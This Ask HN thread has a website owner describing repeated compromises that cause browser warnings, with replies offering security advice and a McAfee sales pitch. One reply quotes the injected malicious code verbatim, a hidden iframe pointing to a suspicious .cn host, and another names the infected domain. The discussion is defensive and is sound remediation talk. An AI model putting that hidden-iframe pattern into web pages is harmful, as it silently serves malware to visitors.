

Ask HN: What is the best way to protect your website from hackers? - ujjwalg

I have a website which was on godaddy servers and got hacked. A warning message used to show up whenever anyone visited the site. I moved the servers to mosso (forwarded from godaddy) and after about a month the website is hacked again and the same warning message has started showing up. I am willing to pay a minimal amount on monthly basis to deal with hacking permanently or do whatever is necessary. Any comments, suggestions, experience will be appreciated. Thanks
======
kierank
Remove the following iframe from your homepage:

    
    
       <iframe src="http://bestwebfind.cn:8080/ts/in.cgi?pepsi11" width=2 height=4 style="visibility: hidden"></iframe>

~~~
ujjwalg
I have tried removing it, but it comes back again. The best way to deal with
hackers, that most people are suggesting is to move on to linux based servers
rather than windows based. So we are probably going to try that.

------
khafra
As asked, the question has no single answer. Security is a continual process,
and a tradeoff with speed, usability, friendliness, bandwidth, etc.

The 100% secure website is one without an internet connection. The 99% secure
website is one on a continually patched server, offering only static content,
and accepting no user-supplied input other than the base url and clicks on
links.

If you want to accept user input and serve dynamic content, it becomes a
complicated process involving, at minimum, awareness of your own
vulnerabilities and threats, and protection against the OWASP Top 10 and
similar lists.

*1. <http://www.owasp.org/index.php/Top_10_2007>

~~~
ujjwalg
Thanks for the input. My website accepts user input (registration, feedback,
forums, payment for buying products etc.) and serves dynamic content. I am not
a developer myself but have hired someone for development. It seems I will
need to hire/subscribe to a service which can provide me with the necessary
expertise.

------
mg1313
You might be having problems with your software, not the hosting. If you use a
blog read about these security measures:
[http://www.mytestbox.com/news/secure-wordpress-blog-
prevent-...](http://www.mytestbox.com/news/secure-wordpress-blog-prevent-
hacking-tips-tricks/)

------
Mistone
my day job is at McAfee, we sell the leading web security testing service
(mcafeesecure.com). Its runs a daily scan on your full website infrastructure,
finding the vulnerabilities hackers are exploiting to access your site and
showing you how to fix them. It's a solid service, used my 75% of the webs top
500 retailers and thousands of business world wide. If you interested in the
service contact me (email in profile).

------
Mistone
i clicked through to the site from ujjwalg's profile and my browser crashed
immediately. Now I'm getting an endless stream of warning messages from my
anti-virus regarding programs trying to access my computer, including a
trojan. wow, pretty hectic.

the domain is watermelonexpress.com avoid it like the plague

------
ErrantX
this suggests the security flaw is with your site code not the hosting
provider :)

What tech/code does your site run on?

